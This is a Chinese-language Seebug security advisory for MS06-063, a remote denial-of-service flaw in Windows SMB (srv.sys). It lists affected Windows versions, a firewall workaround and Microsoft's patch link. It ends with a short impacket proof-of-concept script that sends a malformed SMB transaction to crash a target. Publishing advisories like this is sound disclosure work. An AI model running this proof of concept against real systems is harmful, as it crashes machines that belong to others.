Lucene search

K
seebugRootSSV:144
HistoryOct 25, 2006 - 12:00 a.m.

Microsoft Windows SMB畸形管道请求处理远程拒绝服务漏洞(MS06-063)

2006-10-2500:00:00
Root
www.seebug.org
14

Microsoft Windows是微软发布的非常流行的操作系统。

Windows的Server驱动(srv.sys)在处理某些SMB数据时存在空指针引用错误,远程攻击者可能利用此漏洞导致Windows系统崩溃死机。

如果远程攻击者向有漏洞的系统发送了包含有非正常终止的SMB_COM_TRANSACTION SMB消息(0x25)的话,就可能导致蓝屏死机。目前已有公开的攻击代码。

Microsoft Windows XP SP2
Microsoft Windows XP SP1
Microsoft Windows XP
Microsoft Windows Server 2003 SP1
Microsoft Windows Server 2003
Microsoft Windows 2000SP4
临时解决方法:

  • 在边界防火墙上阻断TCP端口139和445上的入站和出站通讯。

厂商补丁:

Microsoft

Microsoft已经为此发布了一个安全公告(MS06-063)以及相应补丁:
MS06-063:Vulnerability in Server Service Could Allow Denial of Service and Remote Code Execution (923414)
链接:http://www.microsoft.com/technet/security/Bulletin/MS06-063.mspx


                                                from impacket import smb

s = smb.SMB('*SMBSERVER','10.0.1.44')
s.login('','')
tid = s.tree_connect_andx(r'\\*SMBSERVER\IPC$')
s.send_trans(tid, '\x01\x00\x00\x00\x00\x00', 'cuchicuchi','','')